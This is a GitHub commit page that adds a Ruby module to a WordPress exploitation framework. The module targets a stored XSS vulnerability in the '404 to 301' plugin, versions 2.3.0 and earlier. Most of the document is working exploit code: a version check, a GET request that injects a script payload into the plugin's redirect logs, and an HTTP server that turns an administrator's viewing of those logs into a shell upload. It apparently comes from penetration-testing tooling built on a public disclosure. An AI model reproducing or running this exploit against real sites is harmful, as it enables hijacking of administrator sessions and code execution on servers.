Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 4ae51af

Browse files
committed
Add 404 to 301 stored XSS module
1 parent 56ed9f1 commit 4ae51af

File tree

1 file changed

+48
-0
lines changed

1 file changed

+48
-0
lines changed
Lines changed: 48 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,48 @@
1+
class Wpxf::Exploit::Four04ToThree01StoredXssShellUpload < Wpxf::Module
2+
include Wpxf::WordPress::Xss
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: '404 to 301 <= 2.3.0 XSS Shell Upload',
9+
author: [
10+
'ldionmarcil', # Disclosure
11+
'Rob Carr <rob[at]rastating.com>' # WPXF module
12+
],
13+
references: [
14+
['WPVDB', '8611'],
15+
['URL', 'https://gist.github.com/ldionmarcil/6793df929449f8781bb1e213d7e75e23']
16+
],
17+
date: 'Aug 27 2016'
18+
)
19+
end
20+
21+
def check
22+
check_plugin_version_from_readme('404-to-301', '2.3.1')
23+
end
24+
25+
def run
26+
return false unless super
27+
28+
emit_info 'Storing script...'
29+
res = execute_get_request(
30+
url: normalize_uri(full_uri, "?p=#{Utility::Text.rand_numeric(11)}\"><script>#{xss_include_script}</script>")
31+
)
32+
33+
if res.nil?
34+
emit_error 'No response from the target'
35+
return false
36+
end
37+
38+
if res.code != 200
39+
emit_error "Server responded with code #{res.code}"
40+
return false
41+
end
42+
43+
emit_success 'Script stored and will be executed when a user views the 404 to 301 redirect logs'
44+
start_http_server
45+
46+
xss_shell_success
47+
end
48+
end

0 commit comments

Comments
 (0)